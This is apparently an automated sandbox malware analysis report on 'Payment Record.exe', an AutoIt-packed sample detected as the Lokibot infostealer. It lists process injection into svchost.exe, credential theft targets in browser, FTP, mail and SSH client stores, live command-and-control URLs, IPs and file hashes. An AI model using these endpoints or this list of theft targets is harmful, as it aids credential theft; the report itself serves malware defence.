System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.16.1 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Payment Record.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Payment Record.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CB7008

Jump to behavior

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006F87B1 LogonUserW,

0_2_006F87B1

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006A3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_006A3B3A

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006A48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_006A48D7

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_00704C7F mouse_event,

0_2_00704C7F

Source: C:\Users\user\Desktop\Payment Record.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Record.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006F7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_006F7CAF

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006F874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_006F874B

Source: Payment Record.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Payment Record.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006C862B cpuid

0_2_006C862B

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006D4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_006D4E87

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006E1E06 GetUserNameW,

0_2_006E1E06

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006D3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_006D3F3A

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006A49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006A49A0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment Record.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 320, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.3366643257.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: PopPassword		2_2_0040D069
Source: C:\Windows\SysWOW64\svchost.exe	Code function: SmtpPassword		2_2_0040D069

Source: Payment Record.exe	Binary or memory string: WIN_81
Source: Payment Record.exe	Binary or memory string: WIN_XP
Source: Payment Record.exe	Binary or memory string: WIN_XPe
Source: Payment Record.exe	Binary or memory string: WIN_VISTA
Source: Payment Record.exe	Binary or memory string: WIN_7
Source: Payment Record.exe	Binary or memory string: WIN_8
Source: Payment Record.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment Record.exe PID: 5952, type: MEMORYSTR

Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_00716283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00716283
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_00716747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00716747
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A76AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00A76AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A76BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00A76BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A76B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00A76B60

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	3 Windows Service	2 Valid Accounts	2 Obfuscated Files or Information	2 Credentials in Registry	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	3 Windows Service	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment Record.exe	37%	ReversingLabs	Win32.Trojan.AutoitInject
Payment Record.exe	30%	Virustotal		Browse

Source	Detection	Scanner	Label
http://alphastand.win/alien/fre.php	100%	Avira URL Cloud	malware
http://kbfvzoboss.bid/alien/fre.php	100%	Avira URL Cloud	phishing
http://alphastand.trade/alien/fre.php	100%	Avira URL Cloud	malware
http://www.ibsensoftware.com/	0%	Avira URL Cloud	safe
http://alphastand.top/alien/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
touxzw.ir	104.21.16.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://touxzw.ir/sccc/five/fre.php	false		high
http://kbfvzoboss.bid/alien/fre.php	true	Avira URL Cloud: phishing	unknown
http://alphastand.win/alien/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.trade/alien/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.top/alien/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	svchost.exe, svchost.exe, 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.16.1	touxzw.ir	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1630614
Start date and time:	2025-03-06 04:02:51 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment Record.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 47 Number of non-executed functions: 285
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.60, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:03:48	API Interceptor	62x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.16.1	Invoice Remittance ref27022558.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/
	ujXpculHYDYhc6i.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sss2/five/fre.php
	368c6e62-b031-5b65-fd43-e7a610184138.eml	Get hash	malicious	HTMLPhisher	Browse	ce60771026585.oakdiiocese.org/p/298?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
	http://orico-rapaciid.xqyrr.cn/eorico/login/	Get hash	malicious	Unknown	Browse	orico-rapaciid.xqyrr.cn/favicon.ico
	Order confirmation.exe	Get hash	malicious	FormBook	Browse	www.englishmaterials.net/3nop/?-Z=cjlpd&Vz=5VQMUr9vdJst/aGqnmtehORilpahgrSgoeoRp4hSLdasMjOC27ijg2BR7Ep4jmwJ4Zkm
	Bank Transfer Accounting Copy.Vbs.vbs	Get hash	malicious	FormBook	Browse	www.fz977.xyz/48bq/
	PO from tpc Type 34.1 34,2 35 Spec.js	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	PO from tpc Type 34.1 34,2 35 Spec 1.js	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	ebu.ps1	Get hash	malicious	FormBook	Browse	www.fz977.xyz/48bq/
	BIS_MT103 101T000000121121.exe	Get hash	malicious	FormBook	Browse	www.cheapwil.shop/ekxu/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
touxzw.ir	Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	ORDER-000291-XLSX.exe	Get hash	malicious	Lokibot	Browse	104.21.112.1
	Quotation_Order_Request_pdf.bat.exe	Get hash	malicious	Lokibot	Browse	104.21.112.1
	PRI_VTK250419A.exe	Get hash	malicious	Lokibot	Browse	104.21.32.1
	Payment.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	ujXpculHYDYhc6i.exe	Get hash	malicious	Lokibot	Browse	104.21.16.1
	PRI_VTK250419A.exe	Get hash	malicious	Lokibot	Browse	104.21.80.1
	7RryusxiMtHBz80.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	PO.exe	Get hash	malicious	Lokibot	Browse	104.21.96.1
	OEoRzjI7JgSiUUd.exe	Get hash	malicious	Lokibot	Browse	104.21.96.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	datasheet.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Play__(Mimi.merhi)__Now_AUD__autoresponse_}.svg	Get hash	malicious	HTMLPhisher	Browse	104.21.64.127
	New order BPD-003666.exe	Get hash	malicious	FormBook	Browse	172.67.222.201
	nabmpsl.elf	Get hash	malicious	Unknown	Browse	1.13.92.239
	nklx86.elf	Get hash	malicious	Unknown	Browse	104.29.0.183
	nklsh4.elf	Get hash	malicious	Unknown	Browse	1.12.59.178
	z15NEWORDERSUPPLY0490402.exe	Get hash	malicious	FormBook	Browse	172.67.187.182
	http://paytrace.com	Get hash	malicious	Unknown	Browse	104.17.223.152
	http://goddyusmall.com/cdn/shop/prev/32ce041007058889bd9ccb8b22ade877/1740465394868/assets/component-quantity-input.js	Get hash	malicious	Unknown	Browse	104.17.232.29
	https://shared.outlook.inky.com/link?domain=uniqueattestation.com&t=h.eJxVjsESgjAQQ3_F6dmhbCmUcuJXVroKUluERWUc_13LzWMySV7eYp29aA6iZ56WRso1DPeVkJkWRh5iyLp4k44eUhwPYkzRQBzniy2htEUhR5wptOhxGXEj7-PTDcuE3PV701hNYFDVJ6NtrZTL7RnQFAqANFgtwWj4iVzprKxqbSqTQJRA17i1_Uque6WpZLv96p_F6T58vkzDPI8.MEQCIFg5ypqbt4YK0JYR-PloKBuDzDQnhOwv9NMnk8bWqCL-AiAXyhaPfHl8_8J--pKjHt82a42BzYij9hHt4B5C12_IIg	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	104.16.2.189

Process:	C:\Users\user\Desktop\Payment Record.exe
File Type:	data
Category:	dropped
Size (bytes):	81202
Entropy (8bit):	7.950026673840645
Encrypted:	false
SSDEEP:	1536:3WjHRlBjBhTQQbnr1QxWLl5bpnw2EVxnGhA87H+2DNQKwRagDOPRCDtAF:3yllB1QMQxWLl5bpn557TDNQKUuCDc
MD5:	FB968E514434B832F43D6DCEE19AE120
SHA1:	A31AF15491DC904BAB73FE5D2648E8A36A964E66
SHA-256:	45731325B713424ED574B09ABE0583F37E500F3B717A4AA8B1E6A93A19D1889C
SHA-512:	9D0BD40DE84858C2B78708BE37118002D18730AF283FD038E24F09AF114AE2143CE00C7652CD2B413CF4B2281554BAAA275EF26008E6BFE89A75C288C3DBD5D2
Malicious:	false
Reputation:	low
Preview:	EA06......;...m0..j..n.N..f..E..B.L(..D.O.Q...6...8..Ef.....T.$W.I.f,v..w.P$...I...e..m.!%.]..y..O).. 1...[R..g...X.#8L\|.y..Ts.......T\|.\.w...H3..s...\|\|.L....P....1..$...^..2.\.;3A..u...."..r..~.. .Z8.-..!..`..(.ri2..$....]h.X.nmO.Q.q...i.J..C.Q.3Zu#.]..69.>.^.6#...I@?.m>.B..@.......u6.4..$b.5...T..:.Y.Zh.).......N..uj.X.[.......i.,...M.........lf...Q..>.E..".P.uI..eO..?3..$!5`....8..g.9..H.D(...o0......8.....X....K6 .&.Z.[...L........`._..2...r.Uy...#..>...7.M.....C.C..4S....C.61Tj... .O}...c.C.....w.>.H2..3o..Pq.@...2.^...@..K.6..m1..eU,U.....).Z.^.6...p...J.....E+."..3.j}.O..&t.......j.y.~.N.Z+..Y..........UT.k]P.........H.U(S.n.q...8...G.T.Uh\.-k}.M...?..0.R Y...iG.....7>.M.S.s..m..Kju....R...G...e..O:...lg....L.lw.r.]>...mjT..V...o.../8.i.]0;].nb..N.\^5d.H..+S 3.!.....E;.......>.2..i.\O+....7(..}..M.Q.......9:..Fc...z.h.3mF.q9.j..{...7....{...)....o/......V..!...$.h.m(..G.._..7....y....O......b...z.B.Qk.!..s.....r .#..........a....;._.i...X

C:\Users\user\AppData\Local\Temp\hurtling

Download File

Process:	C:\Users\user\Desktop\Payment Record.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.430673258975776
Encrypted:	false
SSDEEP:	3072:lKC7neiKphRjAzfeHF5yLsBKdf2YLF9a+pfkxaV:llneiKphRjAZIBKdf2yF/pfkkV
MD5:	325917AA5E360752A72F823AB08C966A
SHA1:	2357D2A98B5420C123C9E4DC937126BF3AF4C950
SHA-256:	914101A46E0E4EE7EF7EB1D8F0B8492A34EF124B1BCE1A5FD205EBD1CA04521D
SHA-512:	4F4FFA018FA62853896ED1DE3E82E119EF17A7FCCA7FFED2BA58AA2ECA60F4111E32CDB37E55D4D8D471E05E0B6C76AB390135DC10C05ED7677BB6EDC4F20F72
Malicious:	false
Reputation:	low
Preview:	y..BVB60C5WZ.ON.I4NHBUBv0G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB.0G5YE.AO.N...I..cbX.Fw*@ (<&$.-),;-B.%Pw(G!o')ip..b8-RUi8ZP.OONGI4N..-...Q...$...Q..... .......Y...-...C.......$...Q..^.....A...X.."....Q.jh...Q..\|.... ..\42..Y.GI4NHBUBfuG5.[6O.F+.4NHBUB60.5T[9NCNGq5NH.]B60G5.c3OO^GI4.IBUBv0G%WZ2MONBI5NHBUB30F5WZ2OOnMI4JHBUB60E5W.2O_NGY4NHBEB6 G5WZ2O_NGI4NHBUB60..VZVOONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB6`F5.Z2OONGI4NHBUB60G5WZ2OONGI4Nf60:B0G5.l3OO^GI4vIBUF60G5WZ2OONGI4NhBU".B#T#;2O/.GI4.IBU.60G.VZ2OONGI4NHBUBv0Guy>S;.NGI..@BU.70G7WZ21NNGI4NHBUB60G5.Z2.a6GI4NHBUb60G5]Z2oONG.5NHBUB60G5WZ2OONG.4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5WZ2OONGI4NHBUB60G5

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	49
Entropy (8bit):	1.2701062923235522
Encrypted:	false
SSDEEP:	3:/l1PL3n:fPL3
MD5:	CD8FA61AD2906643348EEF98A988B873
SHA1:	0B10E2F323B5C73F3A6EA348633B62AE522DDF39
SHA-256:	49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
SHA-512:	1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.896056945999346
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment Record.exe
File size:	992'256 bytes
MD5:	dd113368367877e6e6e2c38d1793629e
SHA1:	a009d3de4a591b136a2b6128fad0e00bb72cb513
SHA256:	4f2274eda30670db71874bec8a27f08a103472c6dea4e1df892d621f05edaaf7
SHA512:	eb6665d380cdfabfc036ec62ab6d9f9f4864be0133f1e068f55706cf54a78854f883f828c9cdf95b2d290a4f017460f32f91bb7339d16d49857bd7b451a0c7ca
SSDEEP:	24576:Eu6J33O0c+JY5UZ+XC0kGso6FafQj6oQodk0jWY:+u0c++OCvkGs9Faf6oY
TLSH:	E325AE2273DDC360CB769173BF6AB7016EBF38614630B95B2F880D7DA950162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C90349 [Thu Mar 6 02:07:05 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F1C0CC7108Ah
jmp 00007F1C0CC63E54h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F1C0CC63FDAh
cmp edi, eax
jc 00007F1C0CC6433Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F1C0CC63FD9h
rep movsb
jmp 00007F1C0CC642ECh
cmp ecx, 00000080h
jc 00007F1C0CC641A4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F1C0CC63FE0h
bt dword ptr [004BE324h], 01h
jc 00007F1C0CC644B0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F1C0CC6417Dh
test edi, 00000003h
jne 00007F1C0CC6418Eh
test esi, 00000003h
jne 00007F1C0CC6416Dh
bt edi, 02h
jnc 00007F1C0CC63FDFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F1C0CC63FE3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F1C0CC64035h
bt esi, 03h
jnc 00007F1C0CC64088h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x29bd4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf1000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
